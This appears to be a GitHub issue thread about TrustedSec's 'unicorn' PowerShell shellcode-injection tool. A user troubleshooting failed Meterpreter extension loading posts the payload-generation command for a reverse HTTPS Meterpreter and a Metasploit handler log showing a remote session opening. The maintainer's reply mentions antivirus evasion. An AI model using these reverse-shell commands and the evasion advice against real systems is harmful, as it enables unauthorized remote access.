search

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

load stdapi - Failed to load extension: No response was received to the core_enumextcmd request. #128

Closed myexploit closed 5 years ago

myexploit commented 5 years ago

Sorry for the spoon feed question,

But im getting "Failed to load extension: No response was received to the core_enumextcmd request." When I try and load load stdapi in MSF.

Im using the PS one liner

python unicorn.py windows/meterpreter/reverse_https 192.168.1.22 443

Quick google and most common response is the error is down to not setting the lhost, which is not the case as I can see lhost is set in the .rc?

Thanks

trustedsec commented 5 years ago

Type load stdapi, load priv, by default we don't load those specific modules due to AV evasion. Hope that helps! Let me know if you need anything else.

myexploit commented 5 years ago

Thanks, I tried and suspect this is me, but im getting the following.

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf5 exploit(multi/handler) > set LHOST 192.168.1.31 LHOST => 192.168.1.31 msf5 exploit(multi/handler) > set LPORT 443 LPORT => 443 msf5 exploit(multi/handler) > set ExitOnSession false ExitOnSession => false msf5 exploit(multi/handler) > set AutoVerifySession false AutoVerifySession => false msf5 exploit(multi/handler) > set AutoSystemInfo false AutoSystemInfo => false msf5 exploit(multi/handler) > set AutoLoadStdapi false AutoLoadStdapi => false msf5 exploit(multi/handler) > exploit -j [] Exploit running as background job 0. [] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://192.168.1.31:443

msf5 exploit(multi/handler) > [] https://192.168.1.31:443 handling request from 192.168.1.20; (UUID: lbgw4yae) Staging x86 payload (180825 bytes) ... [] Meterpreter session 1 opened (192.168.1.31:443 -> 192.168.1.20:1102) at 2019-06-11 06:45:10 -0400

msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...

meterpreter > shell [-] Unknown command: shell. meterpreter > load stdapi priv Loading extension stdapi... [-] Failed to load extension: No response was received to the core_enumextcmd request. Loading extension priv... [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > load stdapi Loading extension stdapi... [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > load priv Loading extension priv... [-] Failed to load extension: No response was received to the core_enumextcmd request.